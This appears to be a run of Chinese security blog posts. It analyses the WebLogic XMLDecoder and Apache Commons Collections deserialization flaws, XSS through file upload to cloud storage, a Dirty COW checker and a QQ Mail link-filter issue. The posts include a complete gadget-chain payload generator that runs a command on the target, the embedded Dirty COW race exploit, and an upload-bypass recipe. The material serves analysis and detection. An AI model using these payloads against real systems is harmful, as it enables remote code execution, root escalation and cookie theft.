        throw new UnsupportedOperationException();
    }

    public boolean readBoolean() throws IOException {
        return (Boolean)this.xmlDecoder.readObject();
    }

    public byte readByte() throws IOException {
        return (Byte)this.xmlDecoder.readObject();
    }

    public int readUnsignedByte() throws IOException {
        return (Integer)this.xmlDecoder.readObject();
    }

    public short readShort() throws IOException {
        return (Short)this.xmlDecoder.readObject();
    }

    public int readUnsignedShort() throws IOException {
        return (Integer)this.xmlDecoder.readObject();
    }

    public char readChar() throws IOException {
        return (Character)this.xmlDecoder.readObject();
    }

    public int readInt() throws IOException {
        return (Integer)this.xmlDecoder.readObject();
    }

    public long readLong() throws IOException {
        return (Long)this.xmlDecoder.readObject();
    }

    public float readFloat() throws IOException {
        return (Float)this.xmlDecoder.readObject();
    }

    public double readDouble() throws IOException {
        return (Double)this.xmlDecoder.readObject();
    }

    public String readLine() throws IOException {
        return (String)this.xmlDecoder.readObject();
    }

    public String readUTF() throws IOException {
        return (String)this.xmlDecoder.readObject();
    }

    public static void main(String[] var0) throws Exception {
        XMLDecoder var1 = new XMLDecoder(new FileInputStream(var0[0]));
        WorkContextXmlInputAdapter var2 = new WorkContextXmlInputAdapter(var1);
        System.out.println(var2.readASCII());
        System.out.println(var2.readInt());
        byte[] var3 = new byte[20];
        var2.readFully(var3);
        System.out.println(var3);
        System.out.println(var2.readBoolean());
        System.out.println(var2.readByte());
        System.out.println(var2.readShort());
        System.out.println(var2.readChar());
        System.out.println(var2.readInt());
        System.out.println(var2.readLong());
        System.out.println(var2.readFloat());
        System.out.println(var2.readDouble());
        System.out.println(var2.readUTF());
        System.out.println(var2.readUTF());
        System.out.println(var2.readUTF());
    }
}

WorkContextXmlInputAdapter->new XMLDecoder(var1)

WorkContextEntrylmpl.class

public static WorkContextEntry readEntry(WorkContextInput var0) throws IOException, ClassNotFoundException {
    String var1 = var0.readUTF();
    return (WorkContextEntry)(var1.length() == 0 ? NULL_CONTEXT : new WorkContextEntryImpl(var1, var0));
}

第72行，readUTF()

WorkContextXmlInputAdapter.class

第103行

1
2
3

public String readUTF() throws IOException {
    return (String)this.xmlDecoder.readObject();
}

当WorkContextEntrylmpl.class中的readUTF执行完成之后，返回反序列化的字符串，rce也执行完成！

weglogic log:

1	/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/logs

参考链接

  xxlegend: Weblogic XMLDecoder RCE分析
  Tomato: WebLogic WLS-WebServices组件反序列化漏洞分析
  童话：CVE-2017-3506 & 10271：Weblogic 远程代码执行漏洞分析及复现笔记
  漏洞环境：Vulhub

写在最后

由于业务发展需要对java知识栈进行学习，而本人对java的熟悉程度，仅限于大学课堂java逃课的水平，非常感谢廖新喜和Tomato的指点，包括idea远程调试docker内的weblogic、weblogic的关键目录结构和jar包、jd-gui。

python回调函数中使用多线程

2017-12-23T06:53:52.000Z

python回调函数demo

下面的demo是根据需求写的简单测试脚本

#!/usr/bin/env python
# coding: utf-8

# 第一个列表为依赖组件和版本号，后面紧跟负责人名称
# 接着出现第二个依赖组件列表，负责人为空了
# 所以根据需求需要对组件、版本号、负责人进行不同处理
# 这时在for循环中根据if判断，写回调函数处理

# 格式不一致数据的测试数据
a = [[u'tool-1', u'1.9.13'], u'xiaowang', u'xiaoqu', [u'tool-2', u'1.9.23'], [u'tool-3', u'1.9.33'], [u'tool-4', u'1.9.43'], u'pi',[u'tool-5', u'1.9.53']]
# a = [[u'tool-1', u'1.9.13'],u'xiaowang',[u'tool-2', u'1.9.23'],u'xiaowang', [u'tool-3', u'1.9.33'],u'xiaowang']
# a = [[u'tool-1', u'1.9.13']]

# [u'tool-1', u'1.9.13']
your_pro = a[0]
# print your_pro

# [u'xiaowang', u'xiaoqu', [u'tool-2', u'1.9.23']]
tmp = a[1:]
# print tmp

def git_callback(whole_v, proj_value, name_value):
    # 如果存在负责人存在
    try:
        if type(name_value[0]) is unicode:
            # 对除去列表0个索引的数据（依赖名和版本号）后面的数据进行遍历
            for i in name_value:
                # 碰到后面的数据是列表的进行回调
                if type(i) is list:
                    tmp_index = whole_v.index(i)+1
                    return git_callback(whole_v, whole_v[whole_v.index(i)], whole_v[tmp_index:])
                else:
                    # 打印依赖、版本号 负责人 开始
                    print proj_value+i.split()+['start']
        else:
            # 如果负责人后跟的组件这种格式的列表数据为空
            # 也就是只有依赖和版本号列表数据，负责人为空，就打印依赖版本号
            ver = proj_value
            owner = name_value
            if type(owner[0]) is unicode:
                return git_callback(whole_v, ver, owner)
            else:
                print ver
                # 这里是为了判断是不是到列表的最后一位
                # 如果是最后一个值，且不是字符串的Unicode，而是列表
                # 就直接打印出项目
                if whole_v.index(owner[0]) == len(whole_v)-1:
                    # 打印最后一个值
                    print whole_v[-1:]
                else:
                    # 这里比较绕，打印调试吧...
                    new_ver = whole_v[whole_v.index(ver)+1]
                    owner = whole_v[whole_v.index(ver)+2:]
                    return git_callback(whole_v, new_ver, owner)
    except IndexError as e:
        print proj_value
        print e
    

git_callback(a, your_pro, tmp)

demo的output:

Boom:git_response pirogue$ python test.py
[u'tool-1', u'1.9.13', u'xiaowang', 'start']
[u'tool-1', u'1.9.13', u'xiaoqu', 'start']
[u'tool-2', u'1.9.23']
[u'tool-3', u'1.9.33']
[u'tool-4', u'1.9.43', u'pi', 'start']
[u'tool-5', u'1.9.53']
list index out of range

python的多线程

下面的代码是从主程序中，摘取出来的代码片段

from multiprocessing.dummy import Pool as ThreadPool

# 判断git查询返回的依赖数据格式不唯一的回调
def git_callback(whole_v, proj_value, name_value, git_cookie):
    # 
    whole_v = whole_v
    list_git = []
    if name_value:
        # print name_value
        for i in name_value:
            # print i
            if i:
                if type(i) is list:
                    tmp_index = whole_v.index(i)+1
                    return git_callback(whole_v, whole_v[whole_v.index(i)], whole_v[tmp_index:], git_cookie)
                else:
                    git_cookie = str(git_cookie.split()[0])+' '+str(git_cookie.split()[1])
                    list_git.append(tuple(git_cookie.split("?")+i.split()))
                    print list_git
                    pool = ThreadPool(100)
                    result = pool.map(pool_git, list_git)
                    print result
                    pool.close()
                    pool.join()                    
    else:
        print proj_value

上面的多线程代码片段是一个回调函数，没有完全根据demo进行改装，有了demo根据需求改起来也不难，多调试就可以了。

python多线程接收多个参数

from multiprocessing.dummy import Pool as ThreadPool

pool = ThreadPool(100)
result = pool.map(pool_git, list_git)
print result
pool.close()
pool.join()

pool_git是你需要多线程调用的功能函数，list_git是pool_git函数需要接收的参数，默认情况下pool_git是一个接收一个参数的函数。
但是我们的功能常常设计的逻辑比较复杂，需要在pool_git中传入多个参数，这时list_git就应该给一个多个元组组成的列表。

stackoverflow上老外给的代码示例：

def multi_run_wrapper(args):
   return add(*args)
def add(x,y):
    return x+y
if __name__ == "__main__":
    from multiprocessing import Pool
    pool = Pool(4)
    results = pool.map(multi_run_wrapper,[(1,2),(2,3),(3,4)])
    print results

output

[3, 5, 7]

Stack Overflow上更多的答疑方便你更好的理解：
https://stackoverflow.com/questions/5442910/python-multiprocessing-pool-map-for-multiple-arguments

相信聪明的你一定能看得懂~

多线程与多进程

1	from multiprocessing.dummy import Pool as ThreadPool

多线程进程池，绑定一个CPU核心

1	from multiprocessing import Pool

多进程，运行于多个cpu核心

如果你搞不懂是CPU密集型的任务，还是IO密集型的任务，那就用这个库两条import都写上，然后分别实例化跑一下就知道耗时长短，用法上只是在创建对象上改几个字母就行Pool和ThreadPool的互换。

老外实例妙趣横生的讲解:《一行代码搞并行》
http://chriskiehl.com/article/parallelism-in-one-line/

学习记录贴,fighting~

Apache Commons Collections反序列化漏洞学习

2017-12-21T16:21:14.000Z

java序列化与反序列化

定义

序列化就是把对象的转换成字节流，便于保存在内存、文件、数据库中（即便于存储或传输）过程；反序列化即逆过程，又字节流还原成对象。

Java中api实现

序列化：java.io.ObjectOutputStream类的writeObject()方法可以实现序列化；
反序列化：java.io.ObjectInputStream类的readObject()方法用于实现反序列化。

将字符串对象“中国”进行序列化存储到本地“test.ser”文件，然后再通过反序列化进行恢复打印输出的样例代码：

package serialize;

import java.io.*;

/*
import java.io.ObjectOutputStream;
import java.io.ObjectInputStream;
import java.io.FileOutputStream;
import java.io.FileInputStream;
*/

public class javaApiSerialize {
public static void main(String args[]) throws Exception{
String obj = "中国";

// 将序列化对象写入test.ser文件中
FileOutputStream fos = new FileOutputStream("test.ser");
ObjectOutputStream os = new ObjectOutputStream(fos);
os.writeObject(obj);
os.close();
System.out.println("序列化完成");

// 从文件test.ser中读取数据
FileInputStream fis = new FileInputStream("test.ser");
ObjectInputStream ois = new ObjectInputStream(fis);
//System.out.println(ois.getClass().getName());
System.out.println(ois);

// 通过反序列化恢复对象obj
String obj2 = (String)ois.readObject();
System.out.println(obj2);
ois.close();
}
}

概念上根本原因

如果Java应用对用户的输入（序列化过的恶意数据），即不可信数据（如序列化过的命令执行代码）做了反序列化处理，产生的非预期对象的过程中可能带来任意代码执行。

Collections漏洞原因

序列化和反序列化函数本身不存在漏洞，而是Collections这个第三方基础库的设计功能过于丰富（设计缺陷），安全研究员在其反序列化过程中发现了可以利用Collections特殊接口通过java语言的反射机制调用任意函数，比如命令执行函数来执行命令。

漏洞形成基础知识

java反射机制

JAVA反射机制
JAVA反射机制是在运行状态中，对于任意一个类，都能够知道这个类的所有属性和方法；对于任意一个对象，都能够调用它的任意一个方法；这种动态获取的信息以及动态调用对象的方法的功能称为java语言的反射机制。
Java反射机制主要提供了以下功能： 在运行时判断任意一个对象所属的类；在运行时构造任意一个类的对象；在运行时判断任意一个类所具有的成员变量和方法；在运行时调用任意一个对象的方法；生成动态代理。
java反射机制详解及Method.invoke解释：http://blog.csdn.net/mr_tim/article/details/51594717

被序列化和反序列化的类

1
2

实现Serializable和Externalizable接口的类的对象才能被序列化。
Serializable接口，只是一个标记接口，不包含任何的方法。如果我们想要序列化一个对象，首先要创建某些OutputStream(如FileOutputStream、ByteArrayOutputStream等)，然后将这些OutputStream封装在一个ObjectOutputStream中。这时候，只需要调用writeObject()方法就可以将对象序列化，并将其发送给OutputStream（记住：对象的序列化是基于字节的，不能使用Reader和Writer等基于字符的层次结构）。而饭序列的过程（即将一个序列还原成为一个对象），需要将一个InputStream(如FileInputstream、ByteArrayInputStream等)封装在ObjectInputStream内，然后调用readObject()即可。

Collections漏洞分析

Collections介绍

由于对java序列化/反序列化的需求，开发过程中常使用一些公共库。

Apache Commons Collections 是一个扩展了Java标准库里的Collection结构的第三方基础库。它包含有很多jar工具包如下图所示，它提供了很多强有力的数据结构类型并且实现了各种集合工具类。

漏洞触发过程

既然是反序列化漏洞，而且我们已经知道反序列化漏洞形成的根本原因是构造一个恶意的序列化rce对象，让序列化rce在反序列化时进行命令执行。

宽泛解释：

漏洞发现者就在Collectios库中找到一个继承了Serializable接口的而且可以调用命令执行的类(InvokerTransformer)，这时候InvokerTransformer创建出来的对象就是可以序列化的对象了，然后通过另外一个继承了Serializable接口的类（AnnotationInvocationHandler）去接收InvokerTransformer构造好的可序列化的任意代码执行对象，通过ObjectOutputStream将对象输出到文件payload。

因为这个payload是通过AnnotationInvocationHandler序列化的，当把payload发送到使用了低版本有漏洞的Collections的应用，ObjectInputStream方法会自动识别是使用了AnnotationInvocationHandler类序列化的对象，进而自动通过AnnotationInvocationHandler的readObject()函数对其进行反对其反序列化操作。

现在我们知道了谁可以构造代码执行，谁负责序列化和反序列化，那为什么会在反序列化时不是正常把命令执行代码反序列化成代码对象，而是执行了命令呢？这里面的触发链条和细节，我们在下面解释。

简化思路：
AnnotationInvocationHandler重写的readObject()在反序列化时优先于原生的readObject()被调用，而重写的readObject()内部有修改Map变量值的操作，readObject()在反序列化时同时修改了变量值时，修改变量这一动作就会触发代码执行。

为什么修改变量会触发代码执行？

在TransformedMap是Collectios库把Map的一个封装实现，功能是通过TransformedMap.decorate()把一个Map对象转换成另外一个Map对象。

1
2
3

public static Map decorate(Map map, Transformer keyTransformer, Transformer valueTransformer) {
    return new TransformedMap(map, keyTransformer, valueTransformer);
}

可以看到decorate函数传入的一个Map对象，Transformer类型的key，Transformer类型的value值。

Transformer是一个接口，其中定义的transform()函数用来将一个对象转换成另一个对象。代码如下：

1
2
3

public interface Transformer {
    public Object transform(Object input);
}

当Map中的任意项的Key或者value被修改，相应的Transformer就会被调用。而这时漏洞的核心InvokerTransformer出现了，它继承了Transformer和Serializable接口，内部通过Java的反射机制可以调用任意函数，只需传入方法名、参数类型和参数。

public class InvokerTransformer implements Transformer, Serializable {

...

    public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
        super();
        iMethodName = methodName;
        iParamTypes = paramTypes;
        iArgs = args;
    }

    public Object transform(Object input) {
        if (input == null) {
            return null;
        }
        try {
            Class cls = input.getClass();
            Method method = cls.getMethod(iMethodName, iParamTypes);
            return method.invoke(input, iArgs);

        } catch (NoSuchMethodException ex) {
            throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' does not exist");
        } catch (IllegalAccessException ex) {
            throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' cannot be accessed");
        } catch (InvocationTargetException ex) {
            throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' threw an exception", ex);
        }
    }

}

若通过它调用Runtime.getRuntime().exec()便可以执行命令，且因继承了Serializable也是易序列化的。重要的是多个Transformer能串联起来，形成ChainedTransformer，而ChainedTransformer正好可以承载Runtime.getRuntime().exec()。

public static void main(String[] args) throws Exception {
    Transformer[] transformers = new Transformer[] {
        new ConstantTransformer(Runtime.class),
        new InvokerTransformer("getMethod", new Class[] {
            String.class, Class[].class }, new Object[] {
            "getRuntime", new Class[0] }),
        new InvokerTransformer("invoke", new Class[] {
            Object.class, Object[].class }, new Object[] {
            null, new Object[0] }),
        new InvokerTransformer("exec", new Class[] {
            String.class }, new Object[] {"calc.exe"})};

    Transformer transformedChain = new ChainedTransformer(transformers);

而上面我们讲到为什么修改Map值，触发代码执行，上面这里便是关键。
因为我们构造出了ChainedTransformer承载了

1	((Runtime)Runtime.class.getMethod("getRuntime",null).invoke(null,null)).exec("calc.exe");

而TransformedMap.decorate()可以把一个Map对象转换成另外一个Map对象，而decorate()的第3个参数传入的就是一个Transformer，我们构造的ChainedTransformer就可以作为第三个参数传入。

我们先随意定义一个Map对象叫做innerMap，通过TransformedMap.decorate()把它转换成另外一个Map对象，叫做outerMap，而decorate()传入的第三个参数就是我们构造好的ChainedTransformer任意代码触发链。这时候如果后面的操作修改了被转换出来的Map对象outerMap的值，就会触发ChainedTransformer内的一系列InvokerTransformer，造成代码执行。

下面是我们通过人为通过Map自己内部的方法修改元素的值来达到触发的目的:

package serialize;

import java.*;
import java.util.HashMap;
import java.util.Map;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

public class Map_Entry {

public static void main(String[] args) throws Exception {
    Transformer[] transformers = new Transformer[] {
        new ConstantTransformer(Runtime.class),
        new InvokerTransformer("getMethod", new Class[] {
            String.class, Class[].class }, new Object[] {
            "getRuntime", new Class[0] }),
        new InvokerTransformer("invoke", new Class[] {
            Object.class, Object[].class }, new Object[] {
            null, new Object[0] }),
        new InvokerTransformer("exec", new Class[] {
            String.class }, new Object[] {" /Applications/Calculator.app/Contents/MacOS/Calculator"})};

    Transformer transformedChain = new ChainedTransformer(transformers);

    Map innerMap = new HashMap();
    innerMap.put("value", "value");
    Map outerMap = TransformedMap.decorate(innerMap, null, transformedChain);

    Map.Entry onlyElement = (Map.Entry) outerMap.entrySet().iterator().next();

    onlyElement.setValue("foobar");

}

}

所以到这里,我们再回头看一下宽泛解释,我们要通过反序列化去自动触发RCE，而不是人为通过Map方法修改Map值触发，所以找到AnnotationInvocationHandler，它的readObject()函数，函数内对memberValues所有的值都有setValue操作，自动触发Transformer构造的rce链。

AnnotationInvocationHandler类继承InvocationHandler和Serializable：

class AnnotationInvocationHandler implements InvocationHandler, Serializable {
    private final Class type;
    private final Map memberValues;

    AnnotationInvocationHandler(Class type, Map memberValues) {
        this.type = type;
        this.memberValues = memberValues;
    }
    ...

AnnotationInvocationHandler的readObject()函数内对memberValues的操作：

private void readObject(java.io.ObjectInputStream s)
    throws java.io.IOException, ClassNotFoundException {
    s.defaultReadObject();


    // Check to make sure that types have not evolved incompatibly

    AnnotationType annotationType = null;
    try {
        annotationType = AnnotationType.getInstance(type);
    } catch(IllegalArgumentException e) {
        // Class is no longer an annotation type; all bets are off
        return;
    }

    Map> memberTypes = annotationType.memberTypes();

    for (Map.Entry memberValue : memberValues.entrySet()) {
        String name = memberValue.getKey();
        Class memberType = memberTypes.get(name);
        if (memberType != null) {  // i.e. member still exists
            Object value = memberValue.getValue();
            if (!(memberType.isInstance(value) ||
                  value instanceof ExceptionProxy)) {
                // 此处触发一些列的Transformer
                memberValue.setValue(
                    new AnnotationTypeMismatchExceptionProxy(
                        value.getClass() + "[" + value + "]").setMember(
                            annotationType.members().get(name)));
            }
        }
    }
}

AnnotationInvocationHandler序列化构造

package serialize;

import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.annotation.Retention;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.util.HashMap;
import java.util.Map;
import java.util.Map.Entry;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;



public class Poc{
    public static void main(String[] args) throws Exception {

        //transformers: 一个transformer链，包含各类transformer对象（预设转化逻辑）的转化数组
        Transformer[] transformers = new Transformer[] {
            new ConstantTransformer(Runtime.class),
            /*
            由于Method类的invoke(Object obj,Object args[])方法的定义
            所以在反射内写new Class[] {Object.class, Object[].class }
            正常POC流程举例：
            ((Runtime)Runtime.class.getMethod("getRuntime",null).invoke(null,null)).exec("gedit");
            */
            new InvokerTransformer(
                "getMethod",
                new Class[] {String.class, Class[].class },
                new Object[] {"getRuntime", new Class[0] }
            ),
            new InvokerTransformer(
                "invoke",
                new Class[] {Object.class,Object[].class }, 
                new Object[] {null, null }
            ),
            new InvokerTransformer(
                "exec",
                new Class[] {String[].class },
                new Object[] { "whoami > /tmp/poc" } //目标机器上反序列化后执行的命令
            )
        };

        //transformedChain: ChainedTransformer类对象，传入transformers数组，可以按照transformers数组的逻辑执行转化操作
        Transformer transformedChain = new ChainedTransformer(transformers);

        //BeforeTransformerMap: Map数据结构，转换前的Map，Map数据结构内的对象是键值对形式，类比于python的dict
        //Map BeforeTransformerMap = new HashMap();
        Map BeforeTransformerMap = new HashMap();

        BeforeTransformerMap.put("hello", "hello");

        //Map数据结构，转换后的Map
       /*
       TransformedMap.decorate方法,预期是对Map类的数据结构进行转化，该方法有三个参数。
            第一个参数为待转化的Map对象
            第二个参数为Map对象内的key要经过的转化方法（可为单个方法，也可为链，也可为空）
            第三个参数为Map对象内的value要经过的转化方法。
       */
        //TransformedMap.decorate(目标Map, key的转化对象（单个或者链或者null）, value的转化对象（单个或者链或者null）);
        Map AfterTransformerMap = TransformedMap.decorate(BeforeTransformerMap, null, transformedChain);

        Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");

        Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);
        ctor.setAccessible(true);
        Object instance = ctor.newInstance(Target.class, AfterTransformerMap);

        File f = new File("/tmp/payload.bin"); //序列化后的payload
        ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
        out.writeObject(instance);
    }
}

/*
思路:构建BeforeTransformerMap的键值对，为其赋值，
     利用TransformedMap的decorate方法，对Map数据结构的key/value进行transforme
     对BeforeTransformerMap的value进行转换，当BeforeTransformerMap的value执行完一个完整转换链，就完成了命令执行

     执行本质: ((Runtime)Runtime.class.getMethod("getRuntime",null).invoke(null,null)).exec(.........)
     利用反射调用Runtime() 执行了一段系统命令, Runtime.getRuntime().exec()

*/

java反序列化漏洞触发链(Collections)

阿里云OSS约等于文件上传漏洞？

2017-09-29T09:59:34.000Z

首先声明这是一篇标题党的文章，阿里云OSS不被这个锅，锅其实还是在企业或者说是用户。

前言

之所以要写这篇口水文，是因为最近在检测自家公司产品时发现存在这个问题，同时不久在测试某src的某系统时也存在类似这种问题，所以个人认为还是要提高一些警惕，让开发或测试者尽量消除不必要的麻烦，不要错误的认为文件托管在oss就可以忽略站内的上传功能存在的安全隐患。

概述

首先借用阿里云oss首页的介绍性文字来解释下oss是什么：

海量、安全、低成本、高可靠的云存储服务，提供99.99999999%的数据可靠性。使用RESTful API 可以在互联网任何位置存储和访问，容量和处理能力弹性扩展，多种存储类型供选择全面优化存储成本。

简单可以理解为企业自身的文件存储服务器。问题出在站点的上传功能，存在任意文件上传，但因为上传到的是oss或文件存储服务器，所以不论是什么类型的脚本都是不解析的，访问会直接下载回来，那作为开发者会高枕无忧了吗？然并卵，我还可以上传一个内容存在xss payload的hack.html的文件，服务器便会静态文件进行解析；重点来了，可能企业在使用oss服务时，使用的域名是img-oss.yourcompanydomain.com，而在你公司的sso或产品为了跨域在开发时set-cookie：*.yourcompanydomain.com，那攻击者就可以拿着img-oss.yourcompanydomain.com/hack.html找对应的场景或发给公司的员工，打开后cookie可能就被“借”走了。

总结两点：

任意文件上传；
站点可以跨域

你看不见我~文末我准备追加一种姿势

案例复现

案例一：

0x01:
set-cookie

0x02:

文件上传，前端验证

先上传图片，然后通过bp抓包，修改后缀为html，进行上传

访问即可打印弹出cookie

案例二：

0x01:

某src在上传文件时不仅会校验文件后缀，在后端也会校验文件头

0x02:

绕过上传

上传后的response

html上传成功，发现其setcookie也是该业务系统全域名的，但使用的oss服务是阿里的oss相关域名isvstore.oss-cn-hangzhou.aliyuncs.com，不是使用其业务系统的域名，这样这两个域名之间是不能相互跨域的，但aliyuncs.com这个域名如果有业务系统，可能也会被利用。但在我测试过之后发现aliyuncs.com这个域名没有业务系统。所以没有影响，才在这里列出来。

但问题是相通的。

传统解决方案

后端校验文件后缀类型；
牛逼点对文件进行重绘；

针对oss解决方案

oss接口开发key管理部分，不同的key可以配置不同类型文件上传权限（服务端改key即可）；
在使用oss时，最好申请一个专用的域名提供文件服务器使用。

文末彩蛋

除了html，你是否知道还有一种文件在特殊场景下会被利用呢？那就是shtml！

shtml用的是SSI指令，SSI是为WEB服务器提供的一套命令，这些命令只要直接嵌入到HTML文档的注释内容之中即可。
 //可以用来读文件
 //可以用来执行命令
 //也是读文件 与FILE不同他支持绝对路径和../来跳转到父目录 而file只能读取当前目录下的

在某众测项目时，曾利用过，当时的情景是一个上传附件的功能存在任意文件上传，asp、aspx、jsp、php等等上传之后，访问都会进行下载，而上传html则造成xss，而xss的奖金并不高；为了提升漏洞的危害，上传了一个shtml，里面的payload就是执行命令，命令执行奖金达到8K。

ps:shtml这个姿势从t00ls论坛上学到的。

CVE-2016-5195(Dirtycow)检测脚本及Ubuntu升级内核方法

2017-09-12T06:58:49.000Z

漏洞编号

CVE-2016-5195

漏洞名称

脏牛（Dirty COW）

风险等级

高

漏洞危害

黑客可以通过远程入侵获取低权限用户shell后，然后利用该漏洞在全版本Linux系统上实现本地提权，从而获取服务器root权限。

漏洞利用条件

黑客可以通过远程入侵获取低权限用户shell后, 才能进一步利用该漏洞。

漏洞影响范围

根据Linux内核官方评估自2007年来发行的 >=2.6.22的内核版本全部受影响。

漏洞验证

我们先通过一个低权限用户meicai登录，通过rz上传一个cowroot二进制漏洞利用程序；
给cowroot执行权限后执行，发现自动提升到root权限。

请不要在生产环境通过漏洞利用程序测试此漏洞，可能造成系统卡死。为防止系统卡死可执行echo 0 > /proc/sys/vm/dirty_writeback_centisecs ，关闭pdflush刷新。

漏洞验证poc

为防止漏洞利用程序造成的危害，我特意编写了一个可以验证漏洞是否存在的python脚本，执行过后可检测系统是否存在漏洞。请执行3次左右，防止漏报情况。

存在漏洞：

不存在漏洞：

漏洞修复

Ubuntu 内核升级:

1、查看是否有最新更新包： dpkg -l | grep linux

2、更新列表：apt-get update 或apt update

3、升级：

Ubuntu12.04版本：apt-get install linux-generic

Ubuntu14.04版本：apt-get upgrade或apt upgrade

4、reboot重启服务器

注意：机器上在做了上述升级后还会存在漏洞未修复！

系统提示我们正在使用的版本安全更新只到2016-08-04这一天，所以官方给出两种解决办法：

升级Ubuntu 14.04 LTS 到 Ubuntu 16.04 LTS：
sudo do-release-upgrade
或者
切换到当前受社区安全支持的内核小版本升级：
sudo apt-get install linux-image-generic-lts-xenial linux-generic-lts-xenial

#!/usr/bin/env python
#coding=utf-8
#-------------------------------------------------------------------------------
# Name:        Linux内核通用提权漏洞检测脚本（Dirty COW）
# vuln:   CVE-2016-5195: https://access.redhat.com/security/cve/CVE-2016-5195
# Author:      pirogue
# Created:     2017-9-11 11:22:08
# Site:        http://pirogue.org
#-------------------------------------------------------------------------------

import subprocess
from subprocess import Popen, PIPE
import os

# 漏洞利用验证代码
poc_code = """

/* 
 * main.c 
 * 
 *  Created on: Oct 21, 2016 
 *      Author: 5t4rk 
 */  
#include  
#include  
#include  
#include  
#include  
  
void *map;  
int f;  
struct stat st;  
char* name;  
  
void * madviseThread(void *arg)  
{  
    char *str;  
    str = (char *) arg;  
    int i, c = 0;  
    for (i = 0; i < 100000000; i++)  
    {  
        c += madvise(map, 100, MADV_DONTNEED);  
    }  
    printf("madvise %d\\n", c);  
}  
  
void * procselfmemThread(void *arg)  
{  
    char *str;  
    str = (char *) arg;  
    int f = open("/proc/self/mem", O_RDWR);  
    int i, c = 0;  
    for (i = 0; i < 100000000; i++)  
    {  
        lseek(f, map, SEEK_SET);  
        c += write(f, str, strlen(str));  
    }  
    printf("procselfmem %d\\n", c);  
}  
  
int main(int argc, char *argv[])  
{  
    if (argc < 3)  
        return 1;  
    pthread_t pth1, pth2;  
    f = open(argv[1], O_RDONLY);  
    fstat(f, &st);  
    name = argv[1];  
    map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);  
    printf("mmap %x\\n", map);  
    pthread_create(&pth1, NULL, madviseThread, argv[1]);  
    pthread_create(&pth2, NULL, procselfmemThread, argv[2]);  
    pthread_join(pth1, NULL);  
    pthread_join(pth2, NULL);  
    return 0;  
}  
"""

# 临时文件内容

test_content = "noo"

# 本地写入文件方法
def write_poc(code, file):
with open(file, 'w') as f:
f.write(code)

# 编译poc
def mc_gcc(file):
pobj = Popen('gcc '+file+" -lpthread -o mc_poc", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
result = pobj.communicate()
return result

# 执行poc
def mc_binx(file):
pobj = Popen('./'+file+" mc_tmp yes|ps -ef|grep '[m]c_poc mc_tmp'|awk '{print $2}'|xargs kill -9", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
result = pobj.communicate()
return result

# 判断是否存在漏洞
def mc_vuln(file):
pobj = Popen('cat '+file, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
result = pobj.communicate()
return result[0]


if __name__ == "__main__":
write_poc(poc_code, 'mc_poc.c')
write_poc(test_content, 'mc_tmp')
mc_gcc('mc_poc.c')
mc_binx('mc_poc')
# print type(mc_vuln('mc_tmp'))
if mc_vuln('mc_tmp') == 'yes':
print 'The os is vulnerability!Please upgrade the kernel.'
elif mc_vuln('mc_tmp') == 'noo':
print 'You are Lucky dog~ No vuln.'

在测试过程中发现poc在执行时会导致机器cpu飙升，于是在代码的逻辑里将poc二进制文件执行过后，马上通过Linux执行杀掉它的进程，防止影响机器上的业务。
所以可能会导致明明存在漏洞，而二进制程序没有执行完就被kill掉了，进而没有检测出漏洞。多执行几次python dirtycow.py，只要出现一次提示存在漏洞，那就是存在漏洞了。
蛤~

QQ邮箱反射型xss漏洞

2017-08-25T09:40:42.000Z

起因

甲方“一个人的安全部”的时候，一个研发的同事在设计一项报表功能时，因为受到邮箱的安全限制无法很好的实现，于是将情况反馈给我。说实话，我对浏览器的安全也不太了解，案头的书翻了几页就没再动过，于是对比了腾讯邮箱的做法，发现了这个xss。

背景

公司使用coremail搭建企业邮箱，开发做了一个通过邮件发送html报表的周报，但在此邮件内有链接地址。邮箱的域名是a.com，而报表中的链接是b.com，当用户打开a.com内的报表邮件，点击其中的链接；因为邮件的内容是通过iframe来加载html报表，同时coremail将iframe加入了内容安全策略(CSP)限制(sandbox=“allow-same-origin allow-popups”)。所以，点击链接虽然可以跳转到b.com，但b.com页面有js脚本，sandbox不允许执行脚本(allow-scripts)，会导致新打开的链接不会加载脚本执行，效果当然也不是开发想要的效果了。

当然通过让厂商修改iframe的sandbox属性，改为sandbox=”allow-same-origin allow-popups allow-popups-to-escape-sandbox”,即可解决这个问题，但会影响邮箱的安全性。

于是我打开qq邮箱，发现QQ邮箱并没有这个iframe策略，而是通过一个三方“云端安全检测”，对邮件内连接进行拦截，提示用户要访问的页面可能有风险。

被src拒绝的“逻辑漏洞”

于是多打开了几封QQ邮件，点击了邮件内的链接，发现腾讯对智联招聘、拉钩等招聘网站的链接不会进行拦截，直接放行跳转，所以这其中是否存在一定的逻辑绕过呢？

测试过程就省略了，说结果吧，个人认为验证逻辑上还是有些问题：

当邮件内容出现链接时，点击跳转，默认QQ邮箱会进行在云端进行拦截检测。但是会有白名单机制，比如 http://www.lagou.com ，会把拉钩的招聘链接进行放行，云端安全检测检->进行跳转放行，无任何提示。

现有的逻辑如下：
https://www.lagou.com 不放行（因为https，非白名单）
www.lagou.com 不放行（不带有http，非白名单）
http://xss.pirogue.org 不放行（非白名单）
等等其他域名都不放行。

